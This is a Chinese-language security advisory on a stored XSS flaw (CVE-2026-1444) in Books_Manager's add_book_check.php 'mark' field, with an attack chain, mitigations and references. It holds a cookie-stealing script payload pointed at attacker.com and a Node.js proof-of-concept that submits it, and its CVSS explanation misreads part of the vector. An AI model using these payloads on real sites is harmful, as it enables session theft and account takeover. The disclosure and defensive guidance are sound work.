CVE-2026-1444 iJason-Liu Books_Manager 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2026-1444

漏洞类型

存储型XSS

CVSS评分

2.4 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

iJason-Liu Books_Manager

漏洞概述

CVE-2026-1444是一个在iJason-Liu Books_Manager项目中发现的存储型跨站脚本（Stored XSS）漏洞。该漏洞存在于controllers/books_center/add_book_check.php文件中，攻击者可以通过mark参数注入恶意JavaScript代码。由于是存储型XSS，恶意代码会被永久保存在服务器端数据库中，所有访问包含该恶意内容的页面的用户都会受到攻击。

该漏洞的CVSS评分为2.4，属于低危级别。攻击复杂度低，但需要高权限用户进行操作，并且需要用户交互才能触发。攻击者利用此漏洞可以窃取用户会话Cookie、劫持用户账号、进行钓鱼攻击或在受害者浏览器中执行任意JavaScript代码。

由于该产品不使用版本控制机制，因此无法确定具体受影响的版本范围。漏洞已在2026年1月26日公开披露，公开的漏洞利用代码可能已被恶意行为者利用。建议使用该系统的用户立即检查并采取相应的安全防护措施，避免敏感信息泄露和潜在的业务损失。

技术细节

该漏洞属于存储型XSS（Stored Cross-Site Scripting）漏洞，攻击原理如下：

1. 漏洞位置：controllers/books_center/add_book_check.php文件中的mark参数
2. 攻击向量：用户输入的mark参数未经过滤直接存入数据库
3. 利用过程：
- 攻击者向add_book_check.php提交包含恶意JavaScript代码的mark参数
- 恶意代码被存储到数据库中
- 当其他用户访问相关页面时，服务器从数据库读取并输出该内容
- 浏览器将恶意代码作为正常HTML/JavaScript执行

4. CVSS 3.1向量分析：
- AV:N（网络攻击）：可远程利用
- AC:L（低攻击复杂度）：无需特殊条件
- PR:H（高权限）：需要具有添加书籍权限的账号
- UI:R（需要用户交互）：需要受害者访问触发页面
- S:U（未改变范围）：影响仅限于当前系统
- C:N/I:L/A:N：机密性无影响，完整性和可用性低影响

5. 攻击条件：
- 攻击者需拥有Books_Manager系统的高权限账号
- 需要诱导其他用户访问包含恶意内容的页面
- 社会工程学攻击以提高用户交互可能性

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标系统使用的iJason-Liu Books_Manager版本，确定add_book_check.php接口位置

STEP 2

步骤2：账号获取

攻击者获取Books_Manager系统的高权限账号（如管理员账号）

STEP 3

步骤3：恶意载荷构造

构造包含恶意JavaScript代码的XSS payload，如<script>document.location='http://attacker.com/?c='+document.cookie</script>

STEP 4

步骤4：漏洞利用

通过mark参数向add_book_check.php提交恶意载荷，payload被存储到数据库

STEP 5

步骤5：诱导访问

攻击者通过社工手段诱导其他用户访问包含恶意内容的书籍列表页面

STEP 6

步骤6：会话劫持

当受害者访问页面时，恶意JavaScript执行，窃取用户Cookie并发送到攻击者服务器

STEP 7

步骤7：账号接管

攻击者利用窃取的Cookie伪装成受害者进行进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2026-1444 PoC - Stored XSS in Books_Manager
// Target: iJason-Liu Books_Manager add_book_check.php
// Parameter: mark

const axios = require('axios');

async function exploitXSS(targetUrl, attackerServer) {
  const xssPayload = `<script>
    fetch('${attackerServer}?cookie=' + document.cookie)
  </script>`;
  
  const exploitData = {
    // Modify these parameters according to the actual form fields
    'mark': xssPayload,
    'book_title': 'Malicious Book',
    'author': 'Attacker',
    'description': 'XSS Exploitation Test'
  };
  
  try {
    const response = await axios.post(
      `${targetUrl}/controllers/books_center/add_book_check.php`,
      exploitData,
      {
        headers: {
          'Content-Type': 'application/x-www-form-urlencoded',
          'Cookie': 'PHPSESSID=<attacker_session>'
        }
      }
    );
    console.log('XSS Payload Submitted:', response.status);
    console.log('When victims view the book list, the XSS will execute');
  } catch (error) {
    console.error('Exploitation failed:', error.message);
  }
}

// Usage
// exploitXSS('http://target.com', 'http://attacker.com/steal');

影响范围

iJason-Liu Books_Manager <= 298ba736387ca37810466349af13a0fdf828e99c（最后已知受影响版本）

所有版本（产品无版本控制，无法确定具体受影响范围）

防御指南

临时缓解措施

在开发者发布官方修复补丁之前，建议采取以下临时缓解措施：1）严格限制add_book_check.php的访问权限，仅允许受信任的管理员访问；2）在Web应用防火墙（WAF）层面添加XSS防护规则，拦截包含<script>标签和JavaScript事件的请求；3）启用浏览器的XSS过滤器功能；4）对所有用户输入实施白名单过滤策略，拒绝任何包含HTML标签的输入；5）定期检查数据库中的书籍记录，清理可疑的恶意内容；6）监控服务器日志，检测异常的请求模式；7）考虑暂时禁用mark字段功能，直到漏洞修复完成。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-1444
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-1444
3 Details https://www.cvedetails.com/cve/CVE-2026-1444/
4 VulDB https://vuldb.com/cve/CVE-2026-1444
5 Link https://blog.y1fan.work/2026/01/13/%E5%AD%98%E5%82%A8%E5%9E%8Bxss/
6 Link https://vuldb.com/?ctiid.342873
7 Link https://vuldb.com/?id.342873
8 Link https://vuldb.com/?submit.736968